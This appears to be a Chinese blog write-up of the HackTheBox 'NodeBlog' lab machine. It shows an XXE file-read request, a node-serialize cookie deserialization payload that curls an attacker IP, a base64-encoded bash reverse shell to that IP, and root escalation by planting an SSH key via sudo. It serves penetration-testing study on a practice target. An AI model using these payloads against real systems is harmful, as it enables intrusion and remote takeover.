HackTheBox | NodeBlog

最新推荐文章于 2024-02-04 17:45:08 发布
最新推荐文章于 2024-02-04 17:45:08 发布
阅读量156 收藏
点赞数
分类专栏: htb记录 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpose_7/article/details/128656195
版权

HackTheBox | NodeBlog

nmap扫描,开启22、5000,其中5000端口的web服务使用node.js开发

image-20230111155456699

访问Web服务

image-20230111155556389

存在登录页面

image-20230111160049345

sqlmap跑一下,没有发现注入点

image-20230111161908078

dirsearch扫描,也只有login页面

image-20230111161938921

尝试手动信息收集,发现存在articles路径

image-20230111162003920

再用dirsearch对articles路径扫描一下,扫到了/articles/new/articles/test两个路径

image-20230111162930327

new页面用于创建新文章

image-20230111163037929

image-20230111163126890

test页面是已经创建好的test文章

image-20230111163111456

回到主页面,检查源代码,看到了js代码,对/articles/xml进行了请求

image-20230111163430189

POST请求访问该页面,看到返回信息中要求了格式

image-20230111163651928

尝试POST内容,还是格式不对

image-20230111171052726

构造一个标准的文件上传请求包,看到发送的XML内容被写入文本框中

POST /articles/xml HTTP/1.1
Host: 10.10.11.139:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"d8a-Q5hbhgQT0KLPhY8od1GY18/i7BA"
Content-Type: multipart/form-data; boundary=---------------------------34916364483540329092468948094
Content-Length: 379

-----------------------------34916364483540329092468948094
Content-Disposition: form-data; name="file"; filename="123.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?> 
<post><title>Example Post</title><description>Example Description</description><markdown>Example Markdown</markdown></post>

-----------------------------34916364483540329092468948094--

image-20230111173653689

进行XXE文件读取

POST /articles/xml HTTP/1.1
Host: 10.10.11.139:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"d8a-Q5hbhgQT0KLPhY8od1GY18/i7BA"
Content-Type: multipart/form-data; boundary=---------------------------34916364483540329092468948094
Content-Length: 433

-----------------------------34916364483540329092468948094
Content-Disposition: form-data; name="file"; filename="123.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [ 
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 
<post><title>Example Post</title><description>Example Description</description><markdown>&xxe;</markdown></post>

-----------------------------34916364483540329092468948094--

image-20230111174239756

看到用户admin

image-20230111174312769

之前访问错误的时候回显报错时得到一些路径

image-20230111174740703

读取server.js的源码

image-20230111175240367

const express = require('express')
const mongoose = require('mongoose')
const Article = require('./models/article')
const articleRouter = require('./routes/articles')
const loginRouter = require('./routes/login')
const serialize = require('node-serialize')
const methodOverride = require('method-override')
const fileUpload = require('express-fileupload')
const cookieParser = require('cookie-parser');
const crypto = require('crypto')
const cookie_secret = "UHC-SecretCookie"
//var session = require('express-session');
const app = express()

mongoose.connect('mongodb://localhost/blog')

app.set('view engine', 'ejs')
app.use(express.urlencoded({ extended: false }))
app.use(methodOverride('_method'))
app.use(fileUpload())
app.use(express.json());
app.use(cookieParser());
//app.use(session({secret: "UHC-SecretKey-123"}));

function authenticated(c) {
    if (typeof c == 'undefined')
        return false

    c = serialize.unserialize(c)

    if (c.sign == (crypto.createHash('md5').update(cookie_secret + c.user).digest('hex')) ){
        return true
    } else {
        return false
    }
}


app.get('/', async (req, res) => {
    const articles = await Article.find().sort({
        createdAt: 'desc'
    })
    res.render('articles/index', { articles: articles, ip: req.socket.remoteAddress, authenticated: authenticated(req.cookies.auth) })
})

app.use('/articles', articleRouter)
app.use('/login', loginRouter)


app.listen(5000)

看到对参数c进行了反序列化操作。在get()中看到c其实就是请求中cookie字段的auth值。

查找之后node-serialize应该是node的一个标准模块,参考https://paper.seebug.org/213/生成反序列化payload

var y={
        rce:function(){
                require('child_process').exec('ls /', function(error, stdout, stderr){console.log(stdout)});
        },
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));

image-20230112102106887

由于需要调用反序列化函数,所以需要使用到(),最后得到的payload如下:

{"rce":"_$$ND_FUNC$$_function(){\r\nrequire('child_process').exec('ls /', function(error, stdout, stderr){console.log(stdout)});}()"}

将其添加到HTTP请求的Cookie字段,此时是尝试读取文件列表,但是没有成功

image-20230112102331708

尝试curl本地,发现成功,所以应该是无回显RCE

{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('curl 10.10.16.5:1234', function(error, stdout, stderr){console.log(stdout)});}()"}

image-20230112103546130

那么就修改payload反弹shell

{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi41LzEyMzQgMD4mMQ==|base64 -d|bash -i', function(error, stdout, stderr){console.log(stdout)});}()"}

拿到之前看到的admin用户的权限

image-20230112103810927

进入/home/admin目录时提示无权限

image-20230112105545923

上传linenum.sh和linpeas.sh进行信息收集,但是没有看到有效信息

手动信息收集,当前主机开放了mongodb,进入node的web服务看看能不能找到一些密码。

/opt/blog/routes/login.js找到admin的密码admin/IppsecSaysPleaseSubscribe

image-20230112105650977

尝试ssh登录,发现只允许公钥

image-20230112105759343

sudo -l检查sudo权限

image-20230112105845943

发现可以读取/home/admin目录下的文件,但是没法进入该目录,提示没有cd命令,应该是做了权限限制

同样也可以sudo读取root用户的文件

image-20230112110244683

既然可以操作/root用户的文件,就想到可以写公钥进去

但是在写的过程中发现无法直接写入authorized_keys,会提示权限不足

尝试先在其他目录创建一个authorized_keys文件,然后移动到/root/.ssh目录下,再将文件的属主、属组修改为root,将文件权限修改为600,此时就可以利用SSH公钥登录root用户。

image-20230112111500690

image-20230112111517624

本地SSH登录

image-20230112111202804

xxL7-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现...
HackTheBox | Driver
Purpose_7的博客
10-11 720
HackTheBox | Driver
HackTheBox | Horizontall
Purpose_7的博客
08-08 941
HackTheBox Horizontall
HackTheBox】 meow
开心星人的博客
06-23 842
选择tcp,稳定一点然后下载starting_point_HappyCoder.ovpn复制到kali中去切换root用户使用命令 到这样就是可以了再打开一个terminal 看到了我们的tun0隧道已经建立好了 ping下这台主机,是可以ping通的 1、缩写VM代表着什么 Virtual Machine2、我们使用什么工具和操作系统进行交互为了通过命令行执行命令,例如启动我们的VPN连接,它也被称作控制台或shell terminal(终端)3、我们使用什么服务形成我们的VPN连接进入我们
Hack The Box——ScriptKiddie
江左盟的博客
02-15 1万+
简介 信息收集 使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图: 访问5000端口发现是简单的黑客工具页面,如图: 使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图: 使用Google和exploit-db搜索该版本漏洞.
Hack The Box-Skyfall
m0_52742680的博客
02-04 1998
HackTheBox季节性靶场第五篇
入坑 Hack The Box
LainWith的博客
10-19 9267
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
连接Hack The Box靶场教程
Atopos545的博客
01-24 655
进去后选好节点,随便选一个就行。免费的就是下载对方vpn并连接,付费的就直接开启一个Pwnbox,我就用的是免费的,这里只介绍免费的方法。下好后把文件放到kali虚拟机里面,创建一个文件放进去就可以了,或者放桌面都行,就看你启动的时候方不方便。之后在终端启动openvpn,就刚才放进kali的文件。新手都是从Starting Point开始的,这里就以这个为例,其他的复刻一下这个步骤就好了。这三种分别对应左边的三种靶机,你要打那个靶机就去开启那个靶机对应的vpn。这样就可以尽情的去打靶,去渗透了!
hack the box lame渗透过程
nini_boom的博客
05-12 1672
hack the box就不多介绍了。直接上题 1、信息收集 端口扫描 nmap -Pn -sV -sC -A -oN 10.10.10.3.txt 10.10.10.3 参数 作用 -Pn 如果主机禁用了ping请求,那么扫描将不能很好地进行下去。-Pn就是默认主机已经启动,并进行全套的检查工作 -sV 检查服务端的软件版本,可针对不同版本选择payload -sC...
Hack The Box——SneakyMailer
江左盟的博客
08-18 1万+
简介 信息收集 漏洞发现 漏洞利用 权限提升 总结
HackTheBox靶机系列之困难Reel
04-09
主要介绍Reel靶机得整个利用过程
keys.zip (hackthebox)
12-05
hackthebox Can you decrypt the message? Zip password: hackthebox
HackTheBox:Hack The Box笔测试和挑战
03-08
哈克盒子Hack The Box笔测试和来自挑战在这里,我们有Hack The Box的演练。
hackthebox:hackthebox.eu工作库
03-10
所有练习和包装盒。 欣赏:3 在CWD中工作,并在flag/标记(奖赏)。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8214
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
node-v5.1.1-linux-x64.tar.xz
05-10
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
基于Android+Java的 AES 加密算法分析.zip
最新发布
05-10
Android是一种基于Linux内核(不包含GNU组件)的自由及开放源代码的移动操作系统,主要应用于移动设备,如智能手机和平板电脑。该系统最初由安迪·鲁宾开发,后被Google公司收购并注资,随后与多家硬件制造商、软件开发商及电信营运商共同研发改良。 Android操作系统的特点包括: 开放源代码:Android系统采用开放源代码模式,允许开发者自由访问、修改和定制操作系统,这促进了技术的创新和发展,使得Android系统具有高度的灵活性和可定制性。 多任务处理:Android允许用户同时运行多个应用程序,并且可以轻松地在不同应用程序之间切换,提高了效率和便利性。 丰富的应用生态系统:Android系统拥有庞大的应用程序生态系统,用户可以从Google Play商店或其他第三方应用市场下载和安装各种各样的应用程序,满足各种需求。 可定制性:Android操作系统可以根据用户的个人喜好进行定制,用户可以更改主题、小部件和图标等,以使其界面更符合个人风格和偏好。 多种设备支持:Android操作系统可以运行在多种不同类型的设备上,包括手机、平板电脑、智能电视、汽车导航系统等。 此外,Android系统还有一些常见的问题,如应用崩溃、电池耗电过快、Wi-Fi连接问题、存储空间不足、更新问题等。针对这些问题,用户可以尝试一些基本的解决方法,如清除应用缓存和数据、降低屏幕亮度、关闭没有使用的连接和传感器、限制后台运行的应用、删除不需要的文件和应用等。 随着Android系统的不断发展,其功能和性能也在不断提升。例如,最新的Android版本引入了更多的安全性和隐私保护功能,以及更流畅的用户界面和更强大的性能。此外,Android系统也在不断探索新的应用场景,如智能家居、虚拟现实、人工智能等领域。 总之,Android系统是一种功能强大、灵活可定制、拥有丰富应用生态系统的移动操作系统,在全球范围内拥有广泛的用户基础。
Visio卷积神经网络(CNN)结构图模板:专业设计资源下载
05-10
Visio卷积神经网络(CNN)结构图模板是一个专为深度学习和人工智能领域设计的绘图工具。该模板提供了一套完整的预制图形和符号,包括卷积层、池化层、全连接层、激活函数等,使得用户能够快速构建和自定义复杂的神经网络架构。通过这个模板,研究人员和工程师可以更加直观和高效地展示和分享他们的模型设计。它适用于学术论文、技术报告、项目演示等多种场合。该资源还包括易于编辑的图层和格式,允许用户根据需要调整网络的每个部分。此外,Visio的拖放功能和自动化特性大大简化了绘图过程,使得即使是初学者也能轻松创建专业的CNN结构图。
hackthebox注册
05-10
如果您想注册HackTheBox,请按照以下步骤操作: 1. 访问HackTheBox网站:https://www.hackthebox.eu/ ... 3. 输入您的电子邮件地址并创建一个帐户。...您可以通过在HackTheBox的论坛上积极参与社区来获得邀请码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值